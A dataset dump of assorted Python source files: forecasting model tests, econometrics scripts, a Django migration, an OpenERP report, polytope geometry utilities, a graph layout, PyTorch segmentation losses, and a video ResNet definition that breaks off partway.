id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
199697 | <filename>tests/orbit/models/test_ktrlite.py
import pytest
import numpy as np
import pandas as pd
from orbit.estimators.stan_estimator import StanEstimatorMAP
from orbit.models.ktrlite import KTRLiteMAP
from orbit.diagnostics.metrics import smape
SMAPE_TOLERANCE = 0.5
@pytest.mark.parametrize(
"seasonality_fs_order", [None, [5]],
ids=['default_order', 'manual_order']
)
def test_ktrlite_single_seas(make_daily_data, seasonality_fs_order):
train_df, test_df, coef = make_daily_data
ktrlite = KTRLiteMAP(
response_col='response',
date_col='date',
seasonality=[365.25],
seasonality_fs_order=seasonality_fs_order,
estimator_type=StanEstimatorMAP
)
ktrlite.fit(train_df)
predict_df = ktrlite.predict(test_df)
expected_columns = ['date', 'prediction_5', 'prediction', 'prediction_95']
expected_shape = (364, len(expected_columns))
expected_num_parameters = 6
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(ktrlite._posterior_samples) == expected_num_parameters
assert smape(test_df['response'].values, predict_df['prediction'].values) <= SMAPE_TOLERANCE
@pytest.mark.parametrize(
"seasonality_fs_order", [None, [2, 5]],
ids=['default_order', 'manual_order']
)
def test_ktrlite_dual_seas(make_daily_data, seasonality_fs_order):
train_df, test_df, coef = make_daily_data
ktrlite = KTRLiteMAP(
response_col='response',
date_col='date',
seasonality=[7, 365.25],
seasonality_fs_order=seasonality_fs_order,
estimator_type=StanEstimatorMAP
)
ktrlite.fit(train_df)
predict_df = ktrlite.predict(test_df)
expected_columns = ['date', 'prediction_5', 'prediction', 'prediction_95']
expected_shape = (364, len(expected_columns))
expected_num_parameters = 6
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(ktrlite._posterior_samples) == expected_num_parameters
assert smape(test_df['response'].values, predict_df['prediction'].values) <= SMAPE_TOLERANCE
@pytest.mark.parametrize("span_level", [.05, .1, .5])
def test_ktrlite_span_level(make_daily_data, span_level):
train_df, test_df, coef = make_daily_data
ktrlite = KTRLiteMAP(
response_col='response',
date_col='date',
seasonality=[7, 365.25],
seasonality_fs_order=[2, 5],
span_level=span_level,
estimator_type=StanEstimatorMAP
)
ktrlite.fit(train_df)
predict_df = ktrlite.predict(test_df)
expected_columns = ['date', 'prediction_5', 'prediction', 'prediction_95']
expected_shape = (364, len(expected_columns))
expected_num_parameters = 6
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(ktrlite._posterior_samples) == expected_num_parameters
assert smape(test_df['response'].values, predict_df['prediction'].values) <= SMAPE_TOLERANCE
knots_df = ktrlite.get_level_knots()
levels_df = ktrlite.get_levels()
assert knots_df.shape[0] == round(1/span_level)
assert levels_df.shape[0] == ktrlite.num_of_observations
@pytest.mark.parametrize("level_knot_dates", [pd.date_range(start='2016-03-01', end='2019-01-01', freq='3M'),
pd.date_range(start='2016-03-01', end='2019-01-01', freq='6M')])
def test_ktrlite_level_knot_dates(make_daily_data, level_knot_dates):
train_df, test_df, coef = make_daily_data
ktrlite = KTRLiteMAP(
response_col='response',
date_col='date',
seasonality=[7, 365.25],
seasonality_fs_order=[2, 5],
level_knot_dates=level_knot_dates,
estimator_type=StanEstimatorMAP
)
ktrlite.fit(train_df)
predict_df = ktrlite.predict(test_df)
expected_columns = ['date', 'prediction_5', 'prediction', 'prediction_95']
expected_shape = (364, len(expected_columns))
expected_num_parameters = 6
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(ktrlite._posterior_samples) == expected_num_parameters
assert smape(test_df['response'].values, predict_df['prediction'].values) <= SMAPE_TOLERANCE
assert np.all(np.isin(ktrlite.level_knot_dates, level_knot_dates))
assert len(ktrlite.level_knot_dates) == len(level_knot_dates)
@pytest.mark.parametrize("level_knot_length", [90, 120])
def test_ktrlite_level_knot_distance(make_daily_data, level_knot_length):
train_df, test_df, coef = make_daily_data
ktrlite = KTRLiteMAP(
response_col='response',
date_col='date',
seasonality=[7, 365.25],
seasonality_fs_order=[2, 5],
level_knot_length=level_knot_length,
estimator_type=StanEstimatorMAP
)
ktrlite.fit(train_df)
predict_df = ktrlite.predict(test_df)
expected_columns = ['date', 'prediction_5', 'prediction', 'prediction_95']
expected_shape = (364, len(expected_columns))
expected_num_parameters = 6
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(ktrlite._posterior_samples) == expected_num_parameters
assert smape(test_df['response'].values, predict_df['prediction'].values) <= SMAPE_TOLERANCE
@pytest.mark.parametrize("coefficients_knot_length", [90, 120])
def test_ktrlite_coef_knot_distance(make_daily_data, coefficients_knot_length):
train_df, test_df, coef = make_daily_data
ktrlite = KTRLiteMAP(
response_col='response',
date_col='date',
seasonality=[7, 365.25],
seasonality_fs_order=[2, 5],
coefficients_knot_length=coefficients_knot_length,
estimator_type=StanEstimatorMAP
)
ktrlite.fit(train_df)
predict_df = ktrlite.predict(test_df)
expected_columns = ['date', 'prediction_5', 'prediction', 'prediction_95']
expected_shape = (364, len(expected_columns))
expected_num_parameters = 6
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(ktrlite._posterior_samples) == expected_num_parameters
assert smape(test_df['response'].values, predict_df['prediction'].values) <= SMAPE_TOLERANCE
def test_ktrlite_predict_decompose(make_daily_data):
train_df, test_df, coef = make_daily_data
ktrlite = KTRLiteMAP(
response_col='response',
date_col='date',
seasonality=[7, 365.25],
seasonality_fs_order=[2, 5],
estimator_type=StanEstimatorMAP
)
ktrlite.fit(train_df)
predict_df = ktrlite.predict(test_df, decompose=True)
expected_columns = ['date', 'prediction_5', 'prediction', 'prediction_95',
'trend_5', 'trend', 'trend_95',
'seasonality_7_5', 'seasonality_7', 'seasonality_7_95',
'seasonality_365.25_5', 'seasonality_365.25', 'seasonality_365.25_95']
expected_shape = (364, len(expected_columns))
expected_num_parameters = 6
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(ktrlite._posterior_samples) == expected_num_parameters
assert smape(test_df['response'].values, predict_df['prediction'].values) <= SMAPE_TOLERANCE
def test_ktrlite_predict_decompose_point_estimate(make_daily_data):
train_df, test_df, coef = make_daily_data
ktrlite = KTRLiteMAP(
response_col='response',
date_col='date',
seasonality=[7, 365.25],
seasonality_fs_order=[2, 5],
estimator_type=StanEstimatorMAP,
n_bootstrap_draws=-1,
)
ktrlite.fit(train_df)
predict_df = ktrlite.predict(test_df, decompose=True)
expected_columns = ['date', 'prediction', 'trend', 'seasonality_7', 'seasonality_365.25']
expected_shape = (364, len(expected_columns))
expected_num_parameters = 6
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(ktrlite._posterior_samples) == expected_num_parameters
assert smape(test_df['response'].values, predict_df['prediction'].values) <= SMAPE_TOLERANCE
| StarcoderdataPython |
3304261 | <reponame>chrisconlon/DiversionReplication
"""
Goal: Run many Nevo cases, save results to a dict
to access these results later
"""
import pyblp
import numpy as np
import pandas as pd
import pathlib
main_dir = pathlib.Path.cwd().parent
data_dir = main_dir / 'data'
dict_dir = data_dir / 'dict'
raw_dir = data_dir / 'raw'
pyblp.options.digits = 2
pyblp.options.verbose = False
from aux_nevo_cases import get_nevo_base, get_nevo_nocons, get_nevo_noalpha, get_nevo_triple, get_nevo_logit, get_nevo_nested
from aux_blp_cases import get_blp_base, get_blp_nocons, get_blp_noalpha, get_blp_triple, get_blp_logit, get_blp_nested
# %%
# %%
# Base
# %%
# Comment this out if you want
results_nevo_nested = get_nevo_nested()
results_nevo_logit = get_nevo_logit()
results_nevo_triple = get_nevo_triple()
results_nevo_nocons = get_nevo_nocons()
results_nevo_noalpha = get_nevo_noalpha()
results_nevo_base = get_nevo_base()
# %%
# Comment this out after running it once
results_blp_nested = get_blp_nested()
results_blp_logit = get_blp_logit()
results_blp_triple = get_blp_triple()
results_blp_nocons = get_blp_nocons()
results_blp_noalpha = get_blp_noalpha()
results_blp_base = get_blp_base() | StarcoderdataPython |
82741 | '''
lab2
'''
#3.1
my_name = 'Tom'
print(my_name.upper())
#3.
my_id = 123
print(my_id)
#3.3
#123=my_id
my_id=your_id=123
print(my_id)
print(your_id)
#3.4
my_id_str = '123'
print(my_id_str)
#3.5
#print(my_name=my_id)
#3.6
print(my_name+my_id_str)
#3.7
print(my_name*3)
#3.8
print('hello, world. This is my first python string.'.split('.'))
#3.9
message = "Tom's id is 123"
print(message) | StarcoderdataPython |
3381038 | <reponame>bpneumann/django-raster
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('raster', '0009_rasterlayer_max_zoom'),
]
operations = [
migrations.AlterField(
model_name='legendentry',
name='expression',
field=models.CharField(help_text=b'Use a number or a valid numpy logical expression where x is the pixel value. For instance: "(-3.0 < x) & (x <= 1)" or "x <= 1".', max_length=500),
preserve_default=True,
),
migrations.AlterField(
model_name='rasterlayer',
name='rasterfile',
field=models.FileField(null=True, upload_to=b'rasters', blank=True),
preserve_default=True,
),
]
| StarcoderdataPython |
3289179 | <reponame>Okamille/mne-python<filename>conftest.py<gh_stars>0
# -*- coding: utf-8 -*-
# Author: <NAME> <<EMAIL>>
#
# License: BSD (3-clause)
import pytest
import warnings
# For some unknown reason, on Travis-xenial there are segfaults caused on
# the line pytest -> pdb.Pdb.__init__ -> "import readline". Forcing an
# import here seems to prevent them (!?). This suggests a potential problem
# with some other library stepping on memory where it shouldn't. It only
# seems to happen on the Linux runs that install Mayavi. Anectodally,
# @larsoner has had problems a couple of years ago where a mayavi import
# seemed to corrupt SciPy linalg function results (!), likely due to the
# associated VTK import, so this could be another manifestation of that.
import readline # noqa
@pytest.fixture(scope='session')
def matplotlib_config():
"""Configure matplotlib for viz tests."""
import matplotlib
matplotlib.use('agg') # don't pop up windows
import matplotlib.pyplot as plt
assert plt.get_backend() == 'agg'
# overwrite some params that can horribly slow down tests that
# users might have changed locally (but should not otherwise affect
# functionality)
plt.ioff()
plt.rcParams['figure.dpi'] = 100
try:
from traits.etsconfig.api import ETSConfig
except Exception:
pass
else:
ETSConfig.toolkit = 'qt4'
try:
with warnings.catch_warnings(record=True): # traits
from mayavi import mlab
except Exception:
pass
else:
mlab.options.backend = 'test'
| StarcoderdataPython |
1684449 | <gh_stars>1-10
import math
import string
def change(s, j, c):
return s[:j] + c + s[j + 1:]
def check(b, a, n, m):
for i in range(n):
count = 0
for j in range(m):
if b[i][j] != a[j]:
count += 1
if count > 1:
return 0
return 1
def solve():
n, m = map(int, input().split())
b = []
for i in range(n):
b.append(input())
s = b[0]
flag = 0
for k in range(m):
if flag == 1:
break
for c in string.ascii_lowercase:
new = change(s, k, c)
if check(b, new, n, m):
flag = 1
print(new)
break
if flag == 0:
print(-1)
if __name__ == '__main__':
for t in range(int(input())):
solve()
| StarcoderdataPython |
4836156 | <filename>openerp/addons/l10n_in_hr_payroll/report/payslip_report.py
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2012-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import tools
from openerp.osv import fields, osv
class payslip_report(osv.osv):
_name = "payslip.report"
_description = "Payslip Analysis"
_auto = False
_columns = {
'name':fields.char('Name', size=32, readonly=True),
'date_from': fields.date('Date From', readonly=True,),
'date_to': fields.date('Date To', readonly=True,),
'year': fields.char('Year', size=4, readonly=True),
'month': fields.selection([('01', 'January'), ('02', 'February'), ('03', 'March'), ('04', 'April'),
('05', 'May'), ('06', 'June'), ('07', 'July'), ('08', 'August'), ('09', 'September'),
('10', 'October'), ('11', 'November'), ('12', 'December')], 'Month', readonly=True),
'day': fields.char('Day', size=128, readonly=True),
'state': fields.selection([
('draft', 'Draft'),
('done', 'Done'),
('cancel', 'Rejected'),
], 'Status', readonly=True),
'employee_id': fields.many2one('hr.employee', 'Employee', readonly=True),
'nbr': fields.integer('# Payslip lines', readonly=True),
'number': fields.char('Number', size=16, readonly=True),
'struct_id': fields.many2one('hr.payroll.structure', 'Structure', readonly=True),
'company_id':fields.many2one('res.company', 'Company', readonly=True),
'paid': fields.boolean('Made Payment Order ? ', readonly=True),
'total': fields.float('Total', readonly=True),
'category_id':fields.many2one('hr.salary.rule.category', 'Category', readonly=True),
}
def init(self, cr):
tools.drop_view_if_exists(cr, 'payslip_report')
cr.execute("""
create or replace view payslip_report as (
select
min(l.id) as id,
l.name,
p.struct_id,
p.state,
p.date_from,
p.date_to,
p.number,
p.company_id,
p.paid,
l.category_id,
l.employee_id,
sum(l.total) as total,
to_char(p.date_from, 'YYYY') as year,
to_char(p.date_from, 'MM') as month,
to_char(p.date_from, 'YYYY-MM-DD') as day,
to_char(p.date_to, 'YYYY') as to_year,
to_char(p.date_to, 'MM') as to_month,
to_char(p.date_to, 'YYYY-MM-DD') as to_day,
1 AS nbr
from
hr_payslip as p
left join hr_payslip_line as l on (p.id=l.slip_id)
where
l.employee_id IS NOT NULL
group by
p.number,l.name,p.date_from,p.date_to,p.state,p.company_id,p.paid,
l.employee_id,p.struct_id,l.category_id
)
""")
payslip_report()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| StarcoderdataPython |
1740127 | <gh_stars>0
import warnings
import numpy as np
# Scipy
try:
from scipy.spatial import ConvexHull
except:
warnings.warn("You don't have scipy package installed. You may get error while using some feautures.")
# Pypolycontain
try:
import pypolycontain as pp
except:
warnings.warn("You don't have pypolycontain properly installed. Can not import objects")
# pycdd
try:
from cdd import Polyhedron,Matrix,RepType
except:
warnings.warn("WARNING: You don't have CDD package installed. Unable to visualize polytopes. You may still visualize zonotopes.")
# Pydrake
try:
import pydrake.solvers.mathematicalprogram as MP
import pydrake.solvers.gurobi as Gurobi_drake
import pydrake.solvers.osqp as OSQP_drake
# use Gurobi solver
global gurobi_solver,OSQP_solver, license
gurobi_solver=Gurobi_drake.GurobiSolver()
license = gurobi_solver.AcquireLicense()
OSQP_solver=OSQP_drake.OsqpSolver()
except:
warnings.warn("You don't have pydrake installed properly. Methods that rely on optimization may fail.")
try:
import pydrake.solvers.scs as scs_drake
scs_solver=scs_drake.ScsSolver()
except:
warnings.warn("You don't have pydrake with SCS solver.")
def to_AH_polytope(P):
"""
Converts the polytopic object P into an AH-polytope. If applied on
a AH-polytope, a deepcopy is returned
"""
if type(P).__name__=="AH_polytope":
return pp.AH_polytope(T=P.T,t=P.t,P=pp.H_polytope(P.P.H,P.P.h))
elif type(P).__name__=="H_polytope":
n=P.H.shape[1]
return pp.AH_polytope(T=np.eye(n),t=np.zeros((n,1)),P=pp.H_polytope(P.H,P.h))
elif type(P).__name__=="zonotope":
q=P.G.shape[1]
return pp.AH_polytope(T=P.G,t=P.x.reshape(-1,1),P=pp.unitbox(N=q).H_polytope,color=P.color)
elif type(P).__name__=="V_polytope":
V=P.list_of_vertices
N=len(V)
T=np.hstack([V[i]-V[-1] for i in range(N-1)])
t=V[-1]
H=np.vstack((-np.eye(N-1),np.ones((1,N-1))))
h=np.zeros((N,1))
h[N-1,0]=1
P=pp.H_polytope(H,h)
return pp.AH_polytope(t,T,P)
else:
raise ValueError("object type not within my polytopic library:",P.type)
def H_to_V(P):
r"""
Returns the vertices of an H_polytope.
Inputs:
* P: H_polytope in :math:`\mathbb{R}^n`
Output:
* V: list of vertices. Each vertex is *numpy.ndarray[float[n,1]]*
**Method**:
The method is based on double description method, and is using pycddlib.
.. warning::
This method can be very slow or numerically unstable for polytopes in high dimensions and/or large number of hyperplanes
"""
if type(P).__name__=="H_polytope":
p_mat=Matrix(np.hstack((P.h,-P.H)))
p_mat.rep_type = RepType.INEQUALITY
poly=Polyhedron(p_mat)
y=np.array(poly.get_generators())
x=y[:,1:]#
x=x[ConvexHull(x).vertices,:]
return x
else:
raise ValueError(str(type(P).__name__)+" is not an H-polytope")
def AH_to_V(P,N=360,epsilon=1e-3,solver="Gurobi"):
"""
Returns the V-polytope form of a 2D pp.AH_polytope.
The method is based on ray shooting.
Inputs:
* P: AH-polytope
* N ``defualt=360``: number of rays
* solver: ``default=Gurobi``. The linear-programming optimization solver.
Returns:
* V: matrix
.. note::
This method only works for 2D AH-polytopes and its for visualization.
For generic use, first use H-V on :math:`\\mathbb{P}` and then apply affine transformation.
Note that H-V uses elimination-based vertex enumeration method that is not scalable.
"""
Q=pp.to_AH_polytope(P)
if Q.n!=2:
raise ValueError("Sorry, but I can only do AH to V operation in 2D using ray shooting")
v=np.empty((N,2))
prog=MP.MathematicalProgram()
zeta=prog.NewContinuousVariables(Q.P.H.shape[1],1,"zeta")
prog.AddLinearConstraint(A=Q.P.H,ub=Q.P.h,lb=-np.inf*np.ones((Q.P.h.shape[0],1)),vars=zeta)
theta=1
c=np.array([np.cos(theta),np.sin(theta)]).reshape(2,1)
c_T=np.dot(c.T,Q.T)
c_T[c_T == 0] = 1e-3
# get_nonzero_cost_vectors(c_T)
a=prog.AddLinearCost(c_T.reshape(Q.P.n),np.zeros(1),zeta)
if solver=="Gurobi":
solver=gurobi_solver
elif solver=="SCS":
solver=scs_solver
else:
raise NotImplementedError
for i in range(N):
theta=i*N/2/np.pi+0.01
c=np.array([np.cos(theta),np.sin(theta)]).reshape(2,1)
c_T=np.dot(c.T,Q.T)
e=a.evaluator()
cost = c_T.reshape(Q.P.H.shape[1])
# cost[cost == 0] = 1e-3
e.UpdateCoefficients(cost)
result=solver.Solve(prog,None,None)
assert result.is_success()
zeta_n=result.GetSolution(zeta).reshape(zeta.shape)
v[i,:]=(np.dot(Q.T,zeta_n)+Q.t).reshape(2)
try:
v=v[ConvexHull(v).vertices,:]
return v
except: # convexhull very small. Add some epsilon
w=np.empty((4*N,2))
for i in range(N):
w[4*i,:]=v[i,:]+np.array([epsilon,epsilon])
w[4*i+1,:]=v[i,:]+np.array([-epsilon,epsilon])
w[4*i+2,:]=v[i,:]+np.array([-epsilon,-epsilon])
w[4*i+3,:]=v[i,:]+np.array([epsilon,-epsilon])
w=w[ConvexHull(w).vertices,:]
return w
def zonotope_to_V(Z):
"""
Finds the vertices of a zonotope
"""
q=Z.G.shape[1]
if q<13:
v=Z.x.T+np.dot(Z.G,vcube(q).T).T
return v[ConvexHull(v).vertices,:]
else:
warnings.warn('Zonotope Vertex Enumeration: \
The number of generators %d is very large. \
Resorting to ray shooting'%q)
return AH_to_V(pp.to_AH_polytope(Z))
def to_V(P,N=500):
r"""
returns the vertices of the polytopic object $P$ in a vertical stack form.
"""
if type(P).__name__=='zonotope':
return zonotope_to_V(P)
elif type(P).__name__=='AH_polytope':
return AH_to_V(P,N=N)
elif type(P).__name__=='H_polytope':
return H_to_V(P)
elif type(P).__name__=="hyperbox":
return zonotope_to_V(P.zonotope)
else:
raise ValueError("Did not recognize the polytopic object"+str(type(P).__name__))
def AH_to_H_old(Q,P0,solver="Gurobi"):
r"""
Converting Q to an H-polytope using an optimization-based method
WARNING: To be deprecated
"""
P={}
P[0]=P0
if solver=="Gurobi":
solver=gurobi_solver
elif solver=="SCS":
solver=scs_solver
else:
raise NotImplementedError
def find_lambda(P):
# First solve for Lambda
program=MP.MathematicalProgram()
eps=program.NewContinuousVariables(1,"epsilon")
Ball=pp.hyperbox(N=P.n).H_polytope
Ball.h=Ball.h*eps
P_plus_symbolic=pp.minkowski_sum(P[0],Ball)
program.AddLinearCost(np.array([1]),np.array([0]),eps)
pp.subset(program,Q,P_plus_symbolic,N=-1)
Theta,Lambda,Gamma,Beta=pp.subset(program,P[0],Q)
result=solver.Solve(program,None,None)
if result.is_success():
Lambda_n=result.Getsolution(Lambda)
eps_n=result.Getsolution(eps)
print("epsilon is",eps_n)
else:
raise ValueError("Not feasible")
return Lambda_n,eps_n
Lambda,eps=find_lambda(P0)
#V=[np.random.random((2,1)) for i in range(10)]
#P=V_polytope(V)
#Q=to_pp.AH_polytope(P)
#
#B=unitbox(4)
#HB=B.H_polytope
#V=H_to_V(HB)
#Q=to_pp.AH_polytope(V_polytope(V))
#ver=AH_to_V(Q)
#G=np.random.random((2,5))
#x=np.random.random((2,1))
#Z=zonotope(x,G)
#V=zonotope_to_V(Z)
def vcube(n):
r"""
:math:`2^n \times n` array of vectors of vertices in unit cube in :math:`\mathbb{R^n}`
"""
from itertools import product
v=list(product(*list(zip([-1]*n,[1]*n))))
return np.array(v) | StarcoderdataPython |
3344031 | # -*- coding: utf-8 -*-
# Copyright (c) Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
"""
Circular Layout
===============
This module contains several graph layouts which rely heavily on circles.
"""
import numpy as np
from ..util import _straight_line_vertices, issparse
def circular(adjacency_mat, directed=False):
"""Places all nodes on a single circle.
Parameters
----------
adjacency_mat : matrix or sparse
The graph adjacency matrix
directed : bool
Whether the graph is directed. If this is True, is will also
generate the vertices for arrows, which can be passed to an
ArrowVisual.
Yields
------
(node_vertices, line_vertices, arrow_vertices) : tuple
Yields the node and line vertices in a tuple. This layout only yields a
single time, and has no builtin animation
"""
if issparse(adjacency_mat):
adjacency_mat = adjacency_mat.tocoo()
num_nodes = adjacency_mat.shape[0]
t = np.linspace(0, 2 * np.pi, num_nodes, endpoint=False)
# Visual coordinate system is between 0 and 1, so generate a circle with
# radius 0.5 and center it at the point (0.5, 0.5).
node_coords = (0.5 * np.array([np.cos(t), np.sin(t)]) + 0.5).T
node_coords = node_coords.astype(np.float32)
line_vertices, arrows = _straight_line_vertices(adjacency_mat,
node_coords, directed)
yield node_coords, line_vertices, arrows
| StarcoderdataPython |
1745364 | import random
import torch
import torch.nn as nn
from nntools.nnet import register_loss
class MultiLabelSoftBinaryCrossEntropy(nn.Module):
def __init__(self, smooth_factor: float = 0, weighted: bool = True,
mcb: bool = False, hp_lambda: int = 10,
epsilon: float = 0.1, logits=True,
first_class_bg=False):
super(MultiLabelSoftBinaryCrossEntropy, self).__init__()
self.smooth_factor = smooth_factor
self.logits = logits
if logits:
self.criterion = nn.BCEWithLogitsLoss(reduction='none' if weighted else 'mean')
else:
self.criterion = nn.BCELoss(reduction='none' if weighted else 'mean')
self.weighted = weighted
self.hp_lambda = hp_lambda
self.MCB = mcb
self.epsilon = epsilon
self.first_class_bg = first_class_bg
def forward(self, y_pred: torch.Tensor, y_true: torch.Tensor) -> torch.Tensor:
if y_pred.size() != y_true.size():
"""
Case in which y_pred.shape == b x c+1 x h x w and y_true.shape == b x c x h x w
"""
y_pred = y_pred[:, 1:] # We don't consider the first class (assuming it is background)
b, c, h, w = y_true.shape
y_true = y_true.float()
if self.smooth_factor:
smooth = random.uniform(0, self.smooth_factor)
soft_targets = (1 - y_true) * smooth + y_true * (1 - smooth)
else:
soft_targets = y_true
bce_loss = self.criterion(y_pred, soft_targets)
if self.weighted and not self.MCB:
N = h * w
weights = y_true.sum(dim=(2, 3), keepdim=True) / N
betas = 1 - weights
bce_loss = y_true * bce_loss * betas + (1 - y_true) * bce_loss * weights
bce_loss = bce_loss.sum() / (b * N)
if self.weighted and self.MCB:
Ypos = y_true.sum(dim=(0, 2, 3), keepdim=False)
mcb_loss = 0
for i, k in enumerate(Ypos):
if self.first_class_bg and i == 0:
tmp = (y_true[:, i] * bce_loss[:, i]).flatten(1, 2)
mcb_loss += torch.topk(tmp, k=self.hp_lambda*25, dim=1, sorted=False).values.mean()
else:
tmp = ((1 - y_true[:, i]) * bce_loss[:, i]).flatten(1, 2)
topk = max(min((k * self.hp_lambda) // b, (1 - y_true[:, i]).sum() // b), self.hp_lambda)
ik = torch.topk(tmp, k=int(topk), dim=1, sorted=False).values
# We can't compute a "k" per image on the batch, so we take an average value
# (limitation of the topk function)
beta_k = (ik.shape[1] / (k/b + ik.shape[1] + self.epsilon))
# For the same reason, beta_k is batch-wise, not image-wise.
# The original paper defines a single beta instead of beta_k; the rational of this choice is unclear.
# On the other hand, here beta_k=lambda/(1+lambda)
mcb_loss += (ik * (1 - beta_k)).mean() # Negative loss
tmp = y_true[:, i] * bce_loss[:, i] # Positive Loss
mcb_loss += (tmp * beta_k).sum() / (y_true[:, i].sum() + self.epsilon)
bce_loss = mcb_loss
return bce_loss
register_loss('MultiLabelSoftBinaryCrossEntropy', MultiLabelSoftBinaryCrossEntropy)
class MultiDatasetCrossEntropy(nn.Module):
def __init__(self, smooth_factor: float = 0, weighted: bool = True, mcb: bool = False,
hp_lambda: int = 10, alpha=None,
epsilon: float = 1e-5,
criterion='CustomCrossEntropy'):
super(MultiDatasetCrossEntropy, self).__init__()
self.epsilon = epsilon
self.alpha = alpha
self.criterion = criterion
if self.criterion == 'CustomCrossEntropy':
self.loss = MultiLabelSoftBinaryCrossEntropy(smooth_factor, weighted, mcb, hp_lambda, epsilon, logits=False,
first_class_bg=True)
elif self.criterion == 'NLL':
self.loss = nn.NLLLoss()
def forward(self, y_pred: torch.Tensor, cm_predictions: list, tag: torch.Tensor, y_true: torch.Tensor):
"""
:param y_pred: Estimation of real labels, BxCxHxW
:param cm_predictions: List of predicted confusion matrix. Each element of the list is a tuple.
tuple[0] = dataset id, tuple[1] = CM tensor of size BxC**2xHxW
:param tag: Tensor of size B
:param y_true: Labels associated to each image (depends of the dataset): BxCxHxW
:return:
"""
loss = 0.0
regularization = 0.0
# y_pred = torch.softmax(y_pred, 1)
y_pred = torch.sigmoid(y_pred)
y_background = torch.clamp(1-y_pred.max(1, keepdim=True).values, 0, 1)
y_pred = torch.cat([y_background, y_pred], 1)
y_bg_true = ~torch.any(y_true, 1, keepdim=True).long()
y_true = torch.cat([y_bg_true, y_true], 1)
if self.criterion == 'NLL':
max_arg = torch.max(y_true, 1, keepdim=False)
gt = max_arg.indices + 1
gt[max_arg.values == 0] = 0
y_true = gt
for d_id, cm in cm_predictions:
y_true_did = y_true[tag == d_id]
y_pred_did = y_pred[tag == d_id]
b, c, h, w = y_pred_did.shape
y_pred_did = y_pred_did.view(b, c, h*w).permute(0, 2, 1).reshape(b*h*w, c, 1)
cm = cm.view(b, c**2, h*w).permute(0, 2, 1)
cm = cm.reshape(b*h*w, c**2).view(b*h*w, c, c)
cm = cm / (cm.sum(1, keepdim=True)+self.epsilon)
# cm = torch.sigmoid(cm)
y_pred_n = torch.bmm(cm, y_pred_did).view(b*h*w, c)
y_pred_n = y_pred_n.view(b, h*w, c).permute(0, 2, 1).reshape(b, c, h, w)
loss += self.loss(torch.clamp(y_pred_n, self.epsilon, 1), y_true_did)
regularization += torch.trace(torch.sum(cm, dim=0)) / (b*h*w)
return loss + self.alpha*regularization
register_loss('MultiDatasetCrossEntropy', MultiDatasetCrossEntropy)
class MultiLabelToCrossEntropyLoss(nn.Module):
def __init__(self, from_logits=False):
super(MultiLabelToCrossEntropyLoss, self).__init__()
if from_logits:
self.loss = nn.CrossEntropyLoss()
else:
self.loss = nn.NLLLoss()
def forward(self, y_pred, y_true):
max_arg = torch.max(y_true, 1, keepdim=False)
gt = max_arg.indices + 1
gt[max_arg.values == 0] = 0
y_true = gt
return self.loss(y_pred, y_true)
| StarcoderdataPython |
1714753 | """
Video Classification with Channel-Separated Convolutional Networks
ICCV 2019, https://arxiv.org/abs/1904.02811
Large-scale weakly-supervised pre-training for video action recognition
CVPR 2019, https://arxiv.org/abs/1905.00561
"""
# pylint: disable=missing-function-docstring, missing-class-docstring
import torch
import torch.nn as nn
__all__ = ['ResNet_IRCSNv2', 'ircsn_v2_resnet152_f32s2_kinetics400']
eps = 1e-3
bn_mmt = 0.1
class Affine(nn.Module):
def __init__(self, feature_in):
super(Affine, self).__init__()
self.weight = nn.Parameter(torch.randn(feature_in, 1, 1, 1))
self.bias = nn.Parameter(torch.randn(feature_in, 1, 1, 1))
self.weight.requires_grad = False
self.bias.requires_grad = False
def forward(self, x):
x = x * self.weight + self.bias
return x
class Bottleneck_IRCSNv2(nn.Module):
def __init__(self, in_planes, planes, stride=1, temporal_stride=1,
down_sample=None, expansion=2, temporal_kernel=3, use_affine=True):
super(Bottleneck_IRCSNv2, self).__init__()
self.expansion = expansion
self.conv1 = nn.Conv3d(in_planes, planes, kernel_size=(1, 1, 1), bias=False, stride=(1, 1, 1))
if use_affine:
self.bn1 = Affine(planes)
else:
self.bn1 = nn.BatchNorm3d(planes, track_running_stats=True, eps=eps, momentum=bn_mmt)
self.conv3 = nn.Conv3d(planes, planes, kernel_size=(3, 3, 3), bias=False,
stride=(temporal_stride, stride, stride),
padding=((temporal_kernel - 1) // 2, 1, 1),
groups=planes)
if use_affine:
self.bn3 = Affine(planes)
else:
self.bn3 = nn.BatchNorm3d(planes, track_running_stats=True, eps=eps, momentum=bn_mmt)
self.conv4 = nn.Conv3d(
planes, planes * self.expansion, kernel_size=1, bias=False)
if use_affine:
self.bn4 = Affine(planes * self.expansion)
else:
self.bn4 = nn.BatchNorm3d(planes * self.expansion, track_running_stats=True, eps=eps, momentum=bn_mmt)
self.relu = nn.ReLU(inplace=True)
self.down_sample = down_sample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
out = self.relu(out)
out = self.conv4(out)
out = self.bn4(out)
if self.down_sample is not None:
residual = self.down_sample(x)
out += residual
out = self.relu(out)
return out
class ResNet_IRCSNv2(nn.Module):
def __init__(self,
block,
block_nums,
num_classes=400,
